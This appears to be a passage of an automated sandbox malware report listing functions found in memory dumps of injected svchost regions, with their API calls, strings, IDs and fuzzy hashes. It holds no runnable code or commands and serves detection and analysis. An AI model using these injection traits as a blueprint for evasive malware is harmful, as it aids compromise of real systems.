GetProcessHeap.KERNEL32 ref: 0000029B92341155
HeapAlloc.KERNEL32 ref: 0000029B92341163
GetProcessHeap.KERNEL32 ref: 0000029B92341187
HeapFree.KERNEL32 ref: 0000029B92341195

Strings

d, xrefs: 0000029B923410CE

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 5a3345180ba77e91fcfb3d5dafcc5f5a5b901078189b5bf33f35895e63f2c491
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: AE416033A28B809BFB658F62F54879AB7A1F389B94F008125DB8907B54DF38D565CF40

Function 0000029B91DD69F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000029B91DD6A18
__scrt_acquire_startup_lock.LIBCMT ref: 0000029B91DD6A6A
_RTC_Initialize.LIBCMT ref: 0000029B91DD6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000029B91DD6ABE
__scrt_release_startup_lock.LIBCMT ref: 0000029B91DD6AE9

Memory Dump Source

Source File: 0000000F.00000002.2635445548.0000029B91DD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B91DD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b91dd0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: f4ec00be3cc19c2d5ffb9c0785d9e5330584c3043609396db8f027f979352358
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 138108297306818EFB63EB29B7493592AD0EF45B80FC44025EB5443F96DB38C445BFA0

Function 0000029B923A75F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000029B923A7618
__scrt_acquire_startup_lock.LIBCMT ref: 0000029B923A766A
_RTC_Initialize.LIBCMT ref: 0000029B923A7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000029B923A76BE
__scrt_release_startup_lock.LIBCMT ref: 0000029B923A76E9

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: fc6a2031c452aeefa9ce90f2c8667e81ed007471b5dcdfc0eca9a460d80990fa
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 5A81A221F3C6418EFB57AB29BACD3BD7394AB857A0F1A40359B0947796DB38C8418F00

Function 0000029B923475F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000029B92347618
__scrt_acquire_startup_lock.LIBCMT ref: 0000029B9234766A
_RTC_Initialize.LIBCMT ref: 0000029B92347698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000029B923476BE
__scrt_release_startup_lock.LIBCMT ref: 0000029B923476E9

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 60396dbf8193c66fe5ac7b650eae64932b251783eb6f54ce96491f2ccaba219a
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 7E81E230F3C2418EFF53AB69BA4D7A92693AB85BB0F444495AB0C47796DB38C8458F00

Function 0000029B923A9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 0000029B923A9889
GetLastError.KERNEL32 ref: 0000029B923A9897
LoadLibraryExW.KERNEL32 ref: 0000029B923A98C1
FreeLibrary.KERNEL32 ref: 0000029B923A9907
GetProcAddress.KERNEL32 ref: 0000029B923A9913

Strings

api-ms-, xrefs: 0000029B923A98A9

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 718d88186cfda39211f00652ecfaa41ce054e7db4dff624115fbfe3c681f6fb3
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 25319435E2A650A9FF17DF16BA0876973A8BB08BB4F1A05399F2E56344DF38C4458B00

Function 0000029B92349804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 0000029B92349889
GetLastError.KERNEL32 ref: 0000029B92349897
LoadLibraryExW.KERNEL32 ref: 0000029B923498C1
FreeLibrary.KERNEL32 ref: 0000029B92349907
GetProcAddress.KERNEL32 ref: 0000029B92349913

Strings

api-ms-, xrefs: 0000029B923498A9

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: fc7e1b1ed16809a650b1f5555c3e405dc308a3f3d7aa29e9c4ed86084af95f10
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 3731A531F2A750A9FF179B17BA0879963A4BB08BB4F190565DF2E4B380DF38C4458B00

Function 0000029B923B1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000029B923B1BCD
GetLastError.KERNEL32 ref: 0000029B923B1BD9
CloseHandle.KERNEL32 ref: 0000029B923B1BF1
CreateFileW.KERNEL32 ref: 0000029B923B1C1C
WriteConsoleW.KERNEL32 ref: 0000029B923B1C3B

Strings

CONOUT$, xrefs: 0000029B923B1BFD

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 91a433c217c04082ad1f486eb7d2e43d4e4ffbc584196f1197b4cce4587230f2
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 13116D25F28B548AF7529F66F94832972A4F788FF4F044225EB5E87798DF78C9048B40

Function 0000029B92351B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000029B92351BCD
GetLastError.KERNEL32 ref: 0000029B92351BD9
CloseHandle.KERNEL32 ref: 0000029B92351BF1
CreateFileW.KERNEL32 ref: 0000029B92351C1C
WriteConsoleW.KERNEL32 ref: 0000029B92351C3B

Strings

CONOUT$, xrefs: 0000029B92351BFD

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: fbeb6a94914a570171b4535a8529eb48f16e952c0f3ab0caa979db4db8e3b743
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 13118221F38B408AF7529B56F958B1972A0F788FF4F444214EB5E87798DF78C5448B40

Function 0000029B923A5C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000029B923A5C4B
GetThreadContext.KERNEL32 ref: 0000029B923A5DB5

Part of subcall function 0000029B923A5A40: GetCurrentThreadId.KERNEL32 ref: 0000029B923A5A44

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: e8391bee6fdca3771a212f1945ba1f677d37caf8d90922ff2d72564ef45cdded
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 78D19A76A19B8885FB71DB1AF59835A77A0F388B94F110226EB8D47BA5DF38C541CF00

Function 0000029B92345C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000029B92345C4B
GetThreadContext.KERNEL32 ref: 0000029B92345DB5

Part of subcall function 0000029B92345A40: GetCurrentThreadId.KERNEL32 ref: 0000029B92345A44

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: d0615ec75562ae8b846c8d4e1fde94dd17ac7934c75cf63c89c1539d01bece7e
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 7FD1AC76A18B8885EB71DB19F59835A77A0F788B94F100256EB8D47BA5DF3CC541CF00

Function 0000029B923A30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000029B923A30D7
HeapAlloc.KERNEL32 ref: 0000029B923A30EA
StrCmpNIW.SHLWAPI ref: 0000029B923A316B
GetProcessHeap.KERNEL32 ref: 0000029B923A31D1
HeapFree.KERNEL32 ref: 0000029B923A31DF

Strings

dialer, xrefs: 0000029B923A3164

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 30d6d1bd8e585801d4b293a0d22b336a39d1fbdc57cead586b7ad879c4b752a2
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: F831C425F29B518AFB56EF16BA0826973A0FB44BA4F0540319F8807B54EF38C4A2CB00

Function 0000029B923430B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000029B923430D7
HeapAlloc.KERNEL32 ref: 0000029B923430EA
StrCmpNIW.SHLWAPI ref: 0000029B9234316B
GetProcessHeap.KERNEL32 ref: 0000029B923431D1
HeapFree.KERNEL32 ref: 0000029B923431DF

Strings

dialer, xrefs: 0000029B92343164

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 689b0c438920bc9e0b22b1dcd681b4d0ed3b2f815af045fb0ee258a69ef0ff31
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: C231A421F29B518AFF16EF16BA4866963A0FB44BA4F1440209F8D07B54EF38C4A2CB00

Function 0000029B923A1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000029B923A1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 0000029B923A1A58
PathFindFileNameW.SHLWAPI ref: 0000029B923A1A67
lstrlenW.KERNEL32 ref: 0000029B923A1A73
StrCpyW.SHLWAPI ref: 0000029B923A1A86
CloseHandle.KERNEL32 ref: 0000029B923A1A94

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 1cf9e5601c1a2223c9aba708858afbed64e4bf9acef4a7ead26ad9c77fb39c54
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: CD015B25F18A519AFB11DF22B55836963A5FB88FE0F494036CF8A43754DF38C986CB00

Function 0000029B92341A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000029B92341A3A
K32GetModuleFileNameExW.KERNEL32 ref: 0000029B92341A58
PathFindFileNameW.SHLWAPI ref: 0000029B92341A67
lstrlenW.KERNEL32 ref: 0000029B92341A73
StrCpyW.SHLWAPI ref: 0000029B92341A86
CloseHandle.KERNEL32 ref: 0000029B92341A94

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 468b229a2f301c5d10b7d8201a507bc93130f30ace5a1e115a40ebc5244552a4
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 6B010921B28A419AFB169B22B55C75963A1EB88BE0F484435DF8D43754DF38C9868B50

Function 0000029B923A37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000029B923A37C8
GetCurrentProcess.KERNEL32 ref: 0000029B923A37D6
VirtualProtectEx.KERNEL32 ref: 0000029B923A37F8
GetCurrentProcess.KERNEL32 ref: 0000029B923A3819
VirtualProtectEx.KERNEL32 ref: 0000029B923A383A
TerminateThread.KERNEL32 ref: 0000029B923A3849

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: c090c4c600650664428e35675aa4731b13ce8687df9ecb69ac4ecbd689cb1256
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 3D111B69E297508AFB669F26F91D76677A4BB58BA1F040425CB4A07754EF3CC5088B00

Function 0000029B923437AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000029B923437C8
GetCurrentProcess.KERNEL32 ref: 0000029B923437D6
VirtualProtectEx.KERNEL32 ref: 0000029B923437F8
GetCurrentProcess.KERNEL32 ref: 0000029B92343819
VirtualProtectEx.KERNEL32 ref: 0000029B9234383A
TerminateThread.KERNEL32 ref: 0000029B92343849

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 01c47a8f307f985bf1e1e1ff130d6ae6c5db7dd17f14c55a5dc92c9d32bcdb66
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: F8112D65E297408AFB269B22F50DB56A7A0BB58BA1F140424CF4D47754EF3CC508CB00

Function 0000029B923A90D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000029B923A9103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000029B923A9198
RtlUnwindEx.NTDLL ref: 0000029B923A91E7

Strings

csm, xrefs: 0000029B923A917E
f, xrefs: 0000029B923A9116

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: d8a26aca7ebe5916b8cc5bcc4ea623442fa863d2c253893c5d4a152907abe331
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: A7518A32E396148EFF16CF25FA48B5937A5F384BA8F5281319B1667B88DB35D841CB00

Function 0000029B923A1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000029B923A1AD8
StrCmpNIW.SHLWAPI ref: 0000029B923A1AF2
lstrlenW.KERNEL32 ref: 0000029B923A1B01
StrCpyW.SHLWAPI ref: 0000029B923A1B16

Strings

\\?\, xrefs: 0000029B923A1AE6

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 1a9b4640c8bd685ba5acba3f7914d658d0756375bdd99c72aaafd630b5bddc43
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 67F04466F286419AF7219F25F6D83696760F744BA8F848031CB8946564DF3CC649CF00

Function 0000029B92341AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000029B92341AD8
StrCmpNIW.SHLWAPI ref: 0000029B92341AF2
lstrlenW.KERNEL32 ref: 0000029B92341B01
StrCpyW.SHLWAPI ref: 0000029B92341B16

Strings

\\?\, xrefs: 0000029B92341AE6

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 7c5799b6964da1f769c7346a1c76950868bf83e89bc4ed125558aebb7ec5592e
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 24F04462F28A419AFB219B65F69D7596760F744BA8F848020CB8D47654DF2CC649CF00

Function 0000029B923A3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000029B923A3222
StrCpyW.SHLWAPI ref: 0000029B923A3232
StrCatW.SHLWAPI ref: 0000029B923A323E
PathCombineW.SHLWAPI ref: 0000029B923A324C

Strings

\\.\pipe\, xrefs: 0000029B923A3218

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: ed7855a1d7046310c6a40dd818b511b216d5fcfaf8746681799ed5727b917dbd
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: C2F05424E38B9495FB054F23FA081256210AB48FE0F0481319F9A07B18CF2CC4418B00

Function 0000029B92343200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000029B92343222
StrCpyW.SHLWAPI ref: 0000029B92343232
StrCatW.SHLWAPI ref: 0000029B9234323E
PathCombineW.SHLWAPI ref: 0000029B9234324C

Strings

\\.\pipe\, xrefs: 0000029B92343218

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 1a9c4932eb089b9cb16f5c0184a1d0996641b1ac61fa683d40d32a5bc1bd8aa9
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 8AF08910F38BC095FB018B13FA095156210AB48FE0F044131DF5E07B18CF2CC4418B00

Function 0000029B923AA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000029B923AA154
GetProcAddress.KERNEL32 ref: 0000029B923AA16A
FreeLibrary.KERNEL32 ref: 0000029B923AA187

Strings

mscoree.dll, xrefs: 0000029B923AA14B
CorExitProcess, xrefs: 0000029B923AA163

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 666fc787f931b81fa28dd704c99aba7e185165ee822e3270d5f9a33dcbd7b141
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: B4F0FE65F39A44A9FF564F70F9983752360AF88BA1F45242B970B45564DF28C48DCF10

Function 0000029B923A51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000029B923A5236

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 774d3bd8ab978b60ff7c21d43fde67f78ae7ebb68182027b1592d11b6eaf7419
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 7D02A736A2DB848AF7618B59F59835AB7A0F3C5794F114125EB8E87BA8DB7CC444CF00

Function 0000029B923451B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000029B92345236

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: f5861fed7ba68e98a19f758ea0f0d1f0b51c1fbd40954379cf201d0898089b54
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 3902C732A2DB848AEBA1CB55F59475AB7A0F3D5794F100155EB8E87BA8DB7CC484CF00

Function 0000029B923B0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000029B923B08A2
GetConsoleMode.KERNEL32 ref: 0000029B923B0960
GetLastError.KERNEL32 ref: 0000029B923B09EA

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 45b2544abe56a39e35ea1af0a4d020bf8543d7c65c773ca83a774ec6b438f30f
